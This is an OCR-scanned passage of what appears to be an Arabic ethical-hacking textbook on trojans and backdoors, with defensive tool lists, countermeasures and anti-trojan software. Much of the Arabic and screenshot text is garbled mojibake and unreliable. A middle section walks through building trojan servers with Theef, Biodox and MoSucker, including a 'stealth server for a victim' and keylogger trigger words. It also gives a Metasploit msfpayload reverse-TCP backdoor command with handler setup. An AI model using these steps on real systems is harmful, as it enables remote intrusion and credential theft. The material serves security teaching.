- Lpjct Run 

- MtcNnc Run 

- P.tirhirue Run 

- Lk*t Run 

- Mtachirw Run 
tfUhn 

- 14k hart* Run 

• MtaNrM Run . 

- Uw Run Once 

- UvrrRun 



bs5 v«* 



(MET Mettfctr '{ruurHtd M 
IPSO** USB VUtflPq 

myin^om* Lrvt Mtttm^n 

•Rigl 



: . 



Startup Programs Monitoring Tool: Security AutoRun 

http : //tcpmonitor . altervi sta. or g : j^-a^ll 
i^^iAsH ^jjuj ^jj . jjAijj cJ^*-^ , ^ c ' Ujlils l^liA^j ^jj ^^jII cijlLniaiill ^LajIs q^^x! till ^^jujj Security AutoRun 

tc^LJI jl^-fljj 6^1^31 ^1 t command-line string 'drivers ^U^JI ^common/user 'registry uf- J^»^ 
a Aiaji .(JjxjuHI I Jasu ^^jII adware j> ^h^i^jII £L * a ^^ cJ? 1 ^ ^Uaj j-^^j ^jjoJI ^jujI 

.x9/ME/NT/2000/XPA^ista/7 ^ ^ ^ 




Other Startup Programs Monitoring Tools 

Absolute Startup manager available at http ://www . absolutestartup . com 
Activestartup available at http://www.hexilesoft.com 
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StartEd Lite available at http : //www . outertech .com 
Startup Inspector available at http : //www . window s startup . com 
Autoruns for Windows available at http://technet.microsoft.com 
Program Starter available at http : //www . ab-tools .com 
Disable Startup available at http : //www . di s ablestartup . com 
StartupMonitor available at http://www.mlin.net 

Chameleon Startup Manager available at http ://w w w . chameleon-managers .com 
Startup Booster available at http : //www . smartpctools . com 



Scanning for Suspicious Files and Folders 



FSIV - 

SHA-1 J MD5 £y*j\Af£ csXS ^ ^ sbVl File Checksum Integrity Verifier (FCIV) 

CjliLJl ^-lA^J S^LuuJl (Jjjl^Jl (j-a (jjaJJj t _jjud^J J-^J^ ^A 3 ^ J& (Jj ,<L^*J ^aJ CjULJl (JA lj i^j] XME 

.XML 4 cjUUj s^IS ^ jjSII I^jj c*L 3 >^Uti 

C:\ CIV>fciv\.exe c:\hash.txt 

// File Checksum Integrity Verifier version 2 .05. 

// 

6blfb2f76cl39c82253732elc8824cc2 c:\hash.txt 

Tripwire 

http : //www . tripwire . com : j^-a^ll 

^)LajJsj (J-ol£ ^iUlojl cJ^Jij 4j1^j3I (j^l^l djUJaixJI l^liaj ^pll ^I^cVI ^£^j3I cj! j^a ja jj Tripwire Enterprise 

,<C>1 L gall jjjlstxij jjjIslaIIj ^jI J^J AjI^UI ClLoaljjual] (JljlaVI 

SIGVERIF - 

http : //books . google . com j http://books.google.co.in : j^-a^ll 
aIo .^UailU ^L^ald <*i j*JI j^j <*3 j^ll Jjxj&II jj ^ j-^j (signature) g& j& Cy* obi ^ SIGVERIF 

.fil jn^VI (jC 4-ilIa j ^c^Ujill j ^Uaill (J^xjujJ S^tclj ^ a ^1 dJ 6^3 j-g JJC. cJjxjujJ ^c-gUjj (j-a ^1 JJJ*JI 

'SIGVERIF fS WINDOWS+R jj d»» j^W ^ jUtfil u^j jl RUN l3> jisll ^ Start l3> >1U pJ i3 - 



File Signature Verification 



cm 




To help maintain the integrity of your system, critical files 
have been digitally signed so that any changes to these 
Files can be quickly detected. 



Click .Advanced to customize verification options. 
Click Start to check for any system files that are not 
digitally signed. 



Start 



Qose 



.Advanced 
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.start ti> j^tj fjii - 

Investigator . jSj^-aill jW ^J* lP 3 jf- £ J^ult ^ t> <SIGVERIF ^ 

sigverif.txt ^ SIGVERIF ^ j ^1 j^l j jj <^IS ^ jjkll -gSaj 

.jj^jll ^ J WINNT j <%windir% ^» 



Files and Folder Integrity Checker: FastSum and Winmd5 

^ j CjI^JI j djULJI <j£Lj* aA\ till ^joli (files and folder integrity checker) cjI^V^JIj CjULJI a^L* <j-a^i 

.Guardian file systems j OSS o-^^j jAtfll lWSII 



FastSum 

http://www.fastsum.com : j^iJI 

A^L* jSa^ll jJUl *UjI 2^ e^ 1 ^ <£^' J 6 (MD5 checksum algorithm) MD5 jjl ^ ^ FastSum 
<j^aLkli ^-^^(fingerprint) djUu^aj ^UijU ^3 .FastSum ^ <L^aLaJl CjUUJI C5 Ic SjWuhII &j .CjULJI 

.CD/DVD c5j^ J^l J «^S1I 




i: 



4* 



■ taw 



B *■ D ' HI l J M>C A4n 

L» WW 





Mi 



WinMD5 i- 

http://www.blisstonia.com : j^-a^ll 

c> lU^ ^! US .CjULI! ("fingerprint") MD5 u^U M L^J (7 ^ ^ ,2000) Jj^j sbi > WinMD5 v2.0 

CIjUL j3 jj 4 Jll<Jl tdiU^Jj .MD5SUM ^ ^ 3j ja^Sl ^Laaajuoll djUu^aJl JjJa Cjlxu^aJl AjUII 
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WinMD5 v2. 04 (C) 2003-2004 by eolson@mit.edu 



File Edit Help 



00® 



Currently Processing: [idle) 
[0 items enqueued) 



Errors Found 







Path | He sh 


Eytes 


StEtUS 


Cq e mpt File _ txt 302E=fecb4f0725c35821 4d.6 7261446e3 


IBS 


EAD 


MD5 SUM . moE £2b3E.al4d6SSf EEe6eUd:aBf 7Z7aa734 


1S6 


laEded 


README, tjct 8531d.2E=44c£710b033e57320830£e83b 


2133 


Good 


WinMDB. ejte 0785cb3f bdeEellSe; 312 4f 5e e973?Eb 


61440 





























Clear 



Abort 



Number of known md5 hashes found in MD5SUM files: 4- 
□ rag files and MD5SUM files ' if available) into this window : ,-„„, = „ = , [...j ,?,„,n„„~, r...ri 



Files and Folder Integrity Checker 



Advanced Checksum Verifier (ACS V) available at http://www.irnis.net 

Fsum Fronted available at http://fsumfe.sourceforge.net 
Verisys available at http://www.ionx.co.uk 

AFICK (Another File Integrity Checker) available at http://afick.sourceforge.net 

File Integrity Monitoring available at http : //www . ncircle .com 

Attribute Manager available at http : //www . miklsof t . com 

PA File Sight available at http : //www . po weradmin . com 

CSP File Integrity Checker available at http://www.tandemsecurity.com 

ExactFile available at http : //www . exactf ile . com 

OS SEC available at http://www.ossec.net 



SCANNING FOR SUSPICIOUS NETWORK ACTIVITIES 

6^lj^)ia A L ^Isu .(Jjrt^l g all ^Uaill C5 ic j^. AjjjuJI CjULjJI J^jj <^ ^J^A 3 1 (j^ 'SjLjall Jill ^ jzJi ^su 

4^^^. packet sniff erj aS^II ^a^li ~\ mi ji^\ $ A\ ^1] 4_jjjuJI cjU* jlx-a JLoijjj a£^l&1I <_£^>^.l <JL^jV1 



,4-kuijVl £>i& jj^j tilj^Qj ^Capsa 

Detecting Trojans and Worms with Capsa Network Analyzer 

http://www.colasoft.com : ja^JI 

JjLj ^>JI Jalisll iajj ^!j(LANs\WLANs) a_£L£111 aA^A\ cAS^\fkA^ol\ cjKi.ffl portable <^ 
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a/b/g/n802.11 

_A^Jjud]| ^I^^Jjol! djljLu ^JJjolflJ^ 

^ 1 aiyi ^ji ^<ji aj^UjI piijj ^cLaaj t Ajjjiii (JjLujjIIj t^jji&ivi ^j^Jij ciujjjyi aj*\ j-a 

<J£ Aj > >1J ^LALtU La-a 6A£jjaJl ^^ic 1 flJ - ^ a <j£ (jC t]\/[ACj 6 IP J^J 6 JJJ - *^ ^^>^ ^ tjjj^lillll ^-juJJ 

(j-a ^aJ Jj^>^i ^^>^ J t fru/i<ft 

. < flJ - b « (JS ^JJJ JJJ-<J1 dil£^a.j iVlj^Sl ^-^J (j^aSUll ^Jakll <J-al£3lj A£jjai3l jjjj^j 




Some Other Technique For Using Trojan (6.6) 



Creating a Server Using the Theef 

^ p% 6 jW^ Theef server .server j client of f^-^j jj^j ^ ^12 j^ks Theef 

^ jj^ill liA s j ^j >> i^ ^1^*3! 4^^kioij U Theef client ^ ,^ j^ > >>^ jU^ 

a > ^1 aJLojjL ^ jij L_a ^joj Theef servers < flLalt <jl ^aJ ^j^La ^ (JjSjj aJu\ ILLoj U1S La£ 11a C5 ic J jj^a^JI lie 

;aJU3I 5-JjLill la^a aJc ^ ^ < — * 'o* jj^^ ^ j Theef client aLJl Lai 



^ "Use' 2.1C 



- 1 



Part 6T0S FTP 2963 



a ^ ^ ^ ^ 



(JjS JUL jli ^aJ LlA La£ ^l^cVI ^L tiljlj j AjauJalL ^j^aliJl JJ> j! jJC Jla.^L j£j JP ^jl jixJ 4 4iliJl ^ 

CONNECT 
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Connect 



IP 1Q.00.13 



- Port 6703 FTP 



Connect 



Disconnect 



[15:05:31] Attempting connection with 10. D O. 13 
[15:05'31] Connection established with 10 D 0.13 
[1 S OS 31] Connection accepted 
£15:05 31] Connected to transfer port 



At & & & -J «s? i> W 



Connected to ser/er 



I^VIS Networkj 'Home 'OS Info 'PC Details ^jj W^ll jU^ <> J! ^ 



Computer Information 



Administrator 
ame VVfi-EGBHSG 1 4L0 
Registered organisation Microsoft 
Reg*tered owner Microsoft 
Workgroup [Unknown] 
Available memory 565 Mb of 1022 Mb 

Processor Genunelntel hteB4 Family 6 Model 42 Stepping 7 (3095 Mhz) 
Display res: 800 x $00 
Printer. [Unknown] 
Hard drives. 

C:\ (6.186 Mb of 16.381 Mb free) 



. * PC Petals] * OS Info ij£ Home Network 



RmtY "Pfrftfi^fr" received, J 



.I^Sa j > ^j-aLkJI ^iilLJI CjUjjja Jj^ > >n j > ^all jt$^J screenshot JatSjJI <^*^ *j spy l3J^ '^ c ' 



Creating a Server Using the Biodox 

B t*SI jjVI c> ^ cr^ j GUI Trojan t> 6 jW^ j Theef j&j jj^jll ^Uij ^ ^ (J^ki ja Biodox 
AjltU) 3^uai J\ Uij^ BIODOX OE Edition.exe ci> J^h ? ^ J^-^ - 

.Qj, lW-*^ CS"^ 4jlU1 J^-^ <JujLaJl <j!)tk £yz 
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CoTwc^^San Port 

Trsn**er «S3 



; Sam | | <-ljO J 



dQ !jawr*W-i.. I CPU I .R« : Ocunfry J' 



Sta^ : fie 



Coded By Who! | wteS-tifctysof t.c 



<!LojjI ^jjj ^ill server *U^U ^ jSj c ^ J^ll ^ ^jja j-a y> U£ server editor f 



3^ ripn s^LL^ •of 

ft fin nun. 



5 fl^Can 



^at.e Enor Message 
I — | sf*itp rural rne^iy 

MtgTim : |i r-c- 



□ Cm 



bet;)) wairmt 



f-"oit ieninot 

Connsclon . 'mm-i | Screen Gap tjf e- 
Trsnatei : 



O 



| State j UjJ | 



active f dead I ve flatus I 



Create ^jj^jI tij* A ^ ^ Cjbl^VI ^i^jall jl jic JU^L ^ jij IP/DNS J^-^ <j' j^' c** 

aIujjj c_a jjoj ^ill server.exe ^-al^l *LijL ^ jIJ ^VtS server 




.■ - : 

— 



9 e**3 



VJuer 



Port Seliin 

GonretLlun : | Screen Capture s |SB63 | 



O VMnoovws O Term 



0 5vst*-i3? 



Uf*NV4 C0rtpaE*~7! Mrw I CC*riHr. ~ ^ rath I Country 



Status ; F£ad r . . 



. JaxJI Iajj l_a jjoj a£ > r^ll jij j^ajj > J^-^ <^ server.exe * flLalt ^Uijl a*j ^jVI 
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I^VIS l& i jpujal \ ^jSj ^1 CjVU^jV! active/deactive status <ij* ^ 



^3 conv^/iicirtB'* 
:::: ; r c: 

keyboard 



■onnc»ar fx*. 



5 Tl ^ lift* 
^ Screen 



] 



Fate Enor Msaaai 



□ sarre n.v.1 n— -,-i-v 



Mcwoue Run ; 



Doflnecion : |msi | Sown Csefc** = [rag-i 



Kef : m»i»3J 



ll"J 



I 3» Stsnjs U#> " 



tP.gg.13 fefaiclr... WIW-ECa , , , True Win ^ata 3093 0.95 GB UiHec ... 



Creating a Server Using the MoSucker 
server *L^b j^VI ja ^ jL .(Visual Basic Trojan) J ^l^ki^U I^jL^I ^ obi > MoSucker 



i^JUll jj^J CreateServer.exe (jj* ^^3^11 j^b ^ jfc server.exe *L£jV 



MoSucker 3.0 

Server Creator/ Editor 

Coded by StperdiwJu. Contans code from Mosudter 2.2 by Krusty 
Campled tor Pubkc release B on November 20/2002, VB6 

<• I want to create a stealth trojan server for a victim 

r Irvkjde MsvbvmfeO.di r your MnSudcer server (adds 7S0 KB) 
P Indude mswrtsodcocx r yotr server (adds 50 KB) 
r* Pack for mnmaJ tie sae 

MBflbdoei TrarajMrt Ziph*- Key 

TVvXJPCUL25873rvFCSXJi< 1376 1 

r Add | 2385 KB to the server. 

C I want to create a visible server for local testing, 
f I want to cdK an ejdsting server 



IXI 
CD 
W 

CD 



1 I Caned I f 



.Ok Cjj3 J^" U£ AjjJaljjaVI dibl^VI ^Ijjj 

pLuijj ^ajL <jU til^ikj ^jll j <JU3l <LiLi3l j^-laj ^2 .server.exe * flLall <j ajjj ^ill j ^jujVI tdi* t jll^j 

.server.exe 



MoSucker 3.0 

Generating server* 



Buikl Date: L1/2S/2QQ2 2;0-4: 12. AM 
Buikd Info: MoSucker 3.0 PLBblkc Rdei 

Level j 



Public UPX 

VerifVirKJ necessary filepaths^ 
Preparing first stub 
Prepa rmg second $tub 
Packing first stub 
Packing second stub 
Modrrying file headers 
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fj&\ aJUII ^Uill (J±3a ^\ j .ok (jj^ server.exe ^ti^a ^jf^ ^J-^j (jj^i^a ^ j^-^ ^ 



Sriecisd Server; 12: VCM MwfaJe 06 Trepans and fladtdocrspVojans Typr [ p Ore? ] • 



| Namgjfrcxt j 



Nohkaban 1 



Options 



Fake Err « 



0 



Log 



F Enable Smart Logging 

Cflptran key wards Id trigger kt^odoer (separate each with A a 



4 S 



I ho Envoi , yahoo r jbgnjHsswor d^Hrt.seoxe rCheckout,-' ec*3tc , 



I 6«d I I I f 




Sheeted Sow: 



. . ■ ^ ... 



Me Bra 



Server ID: 150 1 NHQVjFT JC ! 426420QTPGNOEVC 



CyjfwKey: TWQPOJ.25873IVFCSJQK13761 



VkUm's Name: '/icbm 



Server Name [$): taernd 32 .mscOnfig ,wriexec32,nelEonfig , 



Ejctensonfs): ™,prf r bar,dli JJCCWi-bptfeXtTrhp. 

R prevent same server rnJtl -nftctions (recominendefl 



0 
a 

B 

0 
0 











you nay select a windows icon to asseoate 


< 




> 




with ftxr cle torn fie extenscn/s. 



5™ 



.aJUII <jujLuJI lajfl MoSucker.exe (jj* ^ j-O^ j > lS^ 3 ^ lU*^ iSjj^I ^isu^lL ^ jiil L-i&ij ^jVI 




. A-iauJal lj jL^ajVI fJJ Connect cJJ* J^J f ^ 4_LiuJa3l IP jljj^ JU^L ^ j£j IP <jU. gi O^P>^ 



Creating a Server Using the Metasploit 

cilli <jc Uj^j L£ JU^j^I ^ msf console (Jjjia <.> g-K Jji&ll ^Ikb ^UJI metasploit J^Ij ^ 

: ^U3I jkJi ^ jij metasploit ^ ^ 
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > /Desktop/Backdoor.exe 

ic^VlS Enter ci> j^W ^ ^ 



msf > msfpayload windows/mete rp rete r/ reve rse_tcp LH0ST=1Q . G . 6 . 6 X > Desktop/Back 
doo r . exe 

[ + ] exec: msfpayload windows/mete rp rete r/ reve rse_tcp LH0ST=1G . G . 0 . 6 X > Desktop/ 
Backdoo r . exe 



Backdoor, exe 



Created by msfpayload (http://www.metasploit.com). 
Payload : windows/mete rp rete r/ reve rse_tcp|~" 

Length: 29G 
Options: { "LHOST "=>" 1G . G . Q . 6 " } 

msf > n 
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ii^jji j^j IP j* LHOST J ^ 
.Backdoor.exe u^jj 15 ^ 

J jje^\ <c.U]a (Jjjia (jC Ji j t aLali ligj ^Via e-Lljl Jl ^-ULaJ c_fl jjuoS tA-l^jJall jt$^ J c qUll (JjJtij Asu 

: JVIS Metasploit 

use exploit/multi/handler 



Imsf 


> use exploit/multi/handler 


|msf 


exploit [handler] 


> \ 






[set payload windows/meterpreter/reverse_tcp] f u^ 1 


msf 
pay! 


exploit (handler) 
oad => windows/m 


> set payload windows/met erp ret er/ re verse_tcp 
et erp ret er/ reverse tcp 


msf 


exploit (handler) 


> 




msf 
Ihos 


exploit (handler) 
t => 10.0.0.1 


> set Ihost 18.8.8.1J5 


msf 


exploit [handler) 


>■ 




msf 


exploit (handler) 


> exploit -j -z 




Exploit running 


as background job. 



[sessions -i 1] ^ji* <>- J&lijJI ciljl^a Backdoor.exe <ija J^j ^LS ^j^j 

1 ^ u^j lS^^I SUS ^LauV 

. JJall ^1 j\ aI^IujV Shell <C.Ula iilj£ dJ 4_l*jJa3l jl&^J jL^ajVI (J^asu 



(Trojan Countermeasure) l^jj^ 1 ^ S^UaaJI JjIaJI (6.7) 



.^sin^ll ^Uaill ajIa^JI jjs jj j jiaLkxJI ^ <Jlaj sjI > j^l^ll oi^ .Backdoor j s^l j^A 3 ^ ^>^1 .i^a ajLa^JI ja jj 
.tiL ^j-^LiJI ^Uaill J backdoor j s^j^A 3 ^ * u s ^ - ^ alia ^31 (_3ji=]i ^joaill 11a jjjj 



Trojan Countermeasure 

JiLa ULjakll ^jAslSI Jj l^-jli toi^ 6^1 j Ja ^ u ^i^l jnj>Vn LdAic. ^lllaj£ J^lli ^c^l^)j 6^1 j Ja ^jl > 

tlA jjc-j JjuJI CjU^Kj ^Ld^JjauJl ^UjjujIj c^jUujVI ^ilJaJ ^aSj Jlx* 4 ml > CjLg jlx-o <ajjuJ ^JjlLJl CjUjjJa Jjl^jalJ ;4_JJjoJ| CjIjUJI 
^jl - AjJa JaL^xJl cJ;ilajj 3 lajuljVI (JIa ^ ^JjalaixJl J ojalaixJl jJC. 4 U.VAfi l^jj] 4_iajJaj| ^UaJ Jc backdOOr 

B ^)ijauJl JJ^JI jl <JJ^>iJl iaLL<J3 <£jjaJl JJJ>» ^^>^ ^-^^^ 
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.tgj (JjJ j-a j^L^axJl (j-a CjI InJaliU (JjsljuiJj (J.ia^j t . iWI 

.ClAkulajllj JjajuliII 4 AiajV 4_i1gVI CjIjj^jIIj bUgS 
,^I^JjujVI cJ^ daLuj JJJ^I *Lail^a £tx»ljJ (j^aljSVIj a a a IaII ^aljSVl (J^a^S 

/a j&L^Jl a j> ^\\\ jl ^cxal jJ| liijjj ^ s a£*\ cJ^-^ J^lj^l AjIjS < . uaj 

.ialiJI oaai j 'auditing 'checksums c> ^ jU^l l lW CjUL s jtal 



Backdoor Countermeasures 
i^Vl^ j backdoor s^L^alt j^l^l u^»j <^ ^l^all (s^*^ j^) jj^*^ J j^l lW 

<jl£ lit J-l^Jl jJ ^-llc-j tdljjljyi (j-a lg-L jlS C5^^ ClA^Jjialll t . U^jJ jlaL^xa (jljaU ^Ld^JjaixJl t fljjjJ JjVI ^li^ll Jak 
^nJaJ ^jj ^jl t . la>J /a,j| Jj^a jA i^C* ^ fl^Jtlill ^^ic ftj^lS ^^jll CjLoi jj^l CjI aala (jj^J (jl (j^-aJ ^li-^l 

{security patch) djl -s > ^ ^iij* 4_Ljail jj CjI jl^-aj ^uv^ ^> Jila^JI (j^j^ dJUl! ^-liill 

.backdoor ^J'jjj J^- d*jj*j 'McAfee 'Windows Defender g*Lajj cjI^jj^I Cjlji ^1: 



Trojan horse Construction Kits 

(jl (j£^j tSjjjaa (jj£i (jl (j^j cijlc j ^ A\ d^a ^ CjIj^VI .l^jjjll^ ^^ill 6^lj^>ia 3 L ^Uj (jj-^l^xJI ^cLoij kits 6 ^ 

'Thck-fp.exe 'Thck-tc.exe ///^) c> uj^" Trojan Horse Construction Kit v2.0 

(> sjI jjL jU-aa. ^Uj jSaj t j-aljVl sbl u^jj^^ Thck.exe .Thck-tbc.exej 

dj|i djliLJI (jxi (^1 J*^ j t J jla (J\ (j-<i CjliLJI ^Uijj ^.l^ a\\ (j^j tli^ ^ > aUl jj^ Thck-fp.exe .^j^h^I 
iJ\ COM cJjj^j Thck-tbc.exe ^jI^j c> ^ ti^j j' JjL 

(ajS Time Bomb 

EXE u^W^ A sb ' > Progenic Mail Trojan Construction Kit (PMT) - 

.^ja J\ l^lLu. jV (PM.exe) 
JjUS/s^I jjla <i^aaJ ^UijV ^<u^ jj Pandora's Box 



(Anti-Trojan Software) lj^jj^I »jLi*« ^liukil! (6.8) 



CA ±* ^j;^ t * a ^^ * v ^ 4J^^xJl djU» jIslxJIj ciL (j^aLiJl jj jjj^II ^Uail <jl <LaJI j3 jj* ^^jll ^ alia djbljJa>Jl LLujaU ^3 ;liA JjS 

J jj^alj JJ jJJ^ll ^ aiaJl <LaJ (jl (j^J ^^jll fi^ljjia Aail^o ^1 JJ tilljA ^1 AiLjaVU .backdOOrj '^Ij^A 3 4i^»aJ ^ 

a ni^ll ^1 jJI (J-iLaxj jl <JI jl ^ (J-a^jj (jLa. jjiJI Ajja 4jail£^ll £c*l jJI .backdoor j *^l jj^ a\^^\ c5j^.VI djLd jl»^3! 

.S^ljjia JjJa ^1 jJl (jxi ^jAxJI t fl - ^jaill I^A 



Anti-Trojan Software: TrojanHunter 

http ://www . troj anhunter . com : j^iJI 
JiLd SjLjal! ^cxil jJI ^1 jj| 24^- cJj j^j t * a -'*^j (_^i3l <lifiJI cjlkulalll ^j-a^li jA TrojanHunter 

.4> ^UJI jjjjfaSlI jU^> (> i dialersj 'adware 



6(JjJJUd^j3l ^L-dljJj o^ljjJa <J 
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~ a( jL U£ TrojanHunter ^0*** <> ^ 

.S^ljjla 4_L^a^l c miI^I C5 lc oj^ll A-lkjt-j CjULJI ^ 4_l3lsrJl <C jjuJI 

jiiL<JI (jl^ jjj lali* ^jc c Lu&13 iaLLall (j^a^a 
\ ilalS cjUs ^ jjSJI ^ s jiS ^ j 'TrojanHunter c> yr* 'uW> jj^ Jjk2ll 



t *±A\ <>» L&*j lij SjI jjla (jl^a^ c^l c-ijuaSS - s jSlil! ^jL (jjj jUJI TrojanHunter 



3c Wcw £s#? Iw*? befp 



Update 




Suliitf F (jitter*, tu Start 



H|j} Desktop 

S DJ 1 ^ Dc-IUTlWjts 

13 My Carpiisr 
=r E)^ Local Etek{Ci) 

+ 0 Docuf-wrts and 5rtJtings 

* 0^ PrpycmHe 
•+• 0 RECYCLER 

0 System YtfU*e Jrfonr^km 

+ 0 _j -ih^rcH [Kyu-^r*-! 
-, 1^11 ~ 



Anti-Trojan Software: Emsisoft Anti-Malware 



http : //www . emsi sof t . com/en : j^-a^ll 
4j ^UJI ^IM3 Aijj^ ajU^ jSjj Emsisoft Anti-Malware 



jLo! jjjfll! ^-ail-i^) ^ * *b ^ 1 cijL^UII ^> jjjjI ^ ^ ji^j .rootkitsj * Jj^ 'bots 'worms <adware ^ 



Emsisoft ANTI-MALWARE 



^1 



SCAN COMPUTER 



497493 | DctKtedabiKts: 




VJ Trace Rgnistrv Windows Password t 

IS View ^ deCEctcd Sc<tj bans. . 
3 TratCrPl^ijtrv.FrMCtK.'it ^v^tCFtl Pn,ifrttr4 Bfc<l^ rtoafr y keys 

^1 Tfwan.Geitgrtc.55 15373 [ & ) 2 ffcs ■ h>gti ride 

3 VPS>Tfoian-Woob-B CB1 1 fifes - h^jh nsfc 

EL 



t Scan finished! 



If **ns has bee? 
fojnd on /our PC. yo<J can 
Obtan mof « mfbnnaBon on*n« 
about each detected Marrram. 
Click th* name of the detected 
matware in view 
in a new browser vrincfcKXr. 




© 2£Xj J-2fll2Emst3oft 



qLiarantre and ihen ckdc Si 
About th 
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Anti-Trojan Software 

(j^xj Uua j t iAA hi J j^^3 laU> djlLfki j tSjLjall ActiveX jj^a Uc ^backdoor jj^ j 'worms jj^ a\,^\ 

Anti-Trojan Shield (ATS) available at http : //www . atshield . com 
Spyware Doctor available at http : //www . pctools . com 
Anti-Mai ware BOClean available at http : //www . comodo . com 
Anti-Hacker available at http ://w w w .hide-my-ip .com 
XoftSpySE available at http : //w w w .paretologic . com 
SPYWAREfighter available at http ://w w w . spamf ighter. com 
Anti-Trojan Elite available at http 7/w w w .remo ve-troj an. com 
SUPERAntiSpyware available at http://www.superantispyware.com 
Trojan Remover available at http : //www . simply sup . com 
Twister Antivirus available at http://www.filseclab.com 



(Penetration test) Jtj^VI (6.9) 



cjI^suII Ai^x-<J till ^joij !a& .li^ djj^Ja ^^jJI ^ j^g-^ CjLi^I tdli Loj ^ j^g-SI djUjij ^llo j& Ui J£ jjiis t . l^j .backdoor 



Pen Testing For Trojans and Backdoors 

CurrPortsj TCPView ^Ij^l e 1 ^ 1 
AjjUJI CjLIaxJI (jazJZ :2 S jlaaJI *t 

6 What*s Running j^^ t^iir_Ju3l cjULic (j^a^a j ^t_uu3I ^js CjULixJI ^j^>^^ l^^A 3 c 4^11 

registry ^VIajI q^zJZ :3 SjkaJI -4 
.PC Tools Registry Mechanicj JV Power Tools ^1 j^VI t> *^L^ ^ t*Ui jl .registry cjV^I o- 3 ^ 

(Jjistjujj ^cxiljJ (Jii^ (j-d D^ljjla 4_lk^a^.l jjaUJJ _ jl^_aJl (Jjistjujj ^c-alijJ L— lliLa £y± backdOOrj *^J^h 4_l^a^.l ^jJa jl\ 

L>« U j^j J^-^ djUL L-JJj ^ll Clip. 6 j^Vl 

a I ikiLuji t jj^jjj djU»Ak j^^q! <iajj^<J! iiiiil] ALlil! CjULaII (j^^ l'aa jf^>Jl Windows ^-j^^ c^l t " 1 N ? j 

.ServiWinj SrvMan ^jIj^I 
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'Starter ilj^l i^iLujI j ^ixjaLill ^.^j c-H 3 ^ 6til3i3 . XVindowscJ^*-^ Ujlils cJxju^j s^lj^Ia a l 

5^ ^ j* 2 *' ^ j ^ J^ull jj ^3^31 jAutoruns j 'Security AutoRun 

djU3l j ^IDSesj 6 ^U^ l^j-^^ jj^ f° ^ ^ cijliLill ^Ia^LujI ^ ^Uaill jjljlkV (jj^l g ^11 <jjou31j j^U! cJ^jujI Cy* 
.Backdoor j ^ j^A 3 ^ ^ ^>^V djI^i^JI j dAiLJI <j^a^i ^I^j t^Ulbj j^-g-Ii <j-a ^ jill 11a ^ JJoij ^ ^A^l 
WinMD5j <FastSum SIGVERIF TRIPWIRE < FCIVJ^ f ^l^Mlj ^ULII ^ ^ 

4^j) ikduV o^i :8 S jial *t 

cs^j Capsa Network Analyzer cjIj^I ik&Vl £>iA JS* o-* 1 ^ .^'jj^ uW^' 

(j^l^JI AjjIIaj Uj^j j! TRIPWIRE *\ ikUj Jjxj&II ^Uaj CjliL ^£ l_^!>Ij3I jl cj!1jAxj3I ^1 ^ j^j L >^^i < 



(jl^jjj ^1 ^ < flnt^U (jl^jjj Q^^li JJLuu :10 SjJakJl 4_ 
Jj xjuH j ciiiiij <Lj -L 3jjoi3I ^ Emsisoft Anti-Mai ware j TrojanHunter l!^ u^-jj^ ch^-^ 

^uinil ^la^ :ll d jia^ 4- 

CjLuu jjji]) 4 a at < a jualjj ^u^'i ^ Ul Lai .^UaI2) A Ijt nil Ajji^L ^ cCjLuu 4 a At < a jc-aIjj <*uV\*i ^ ^ 
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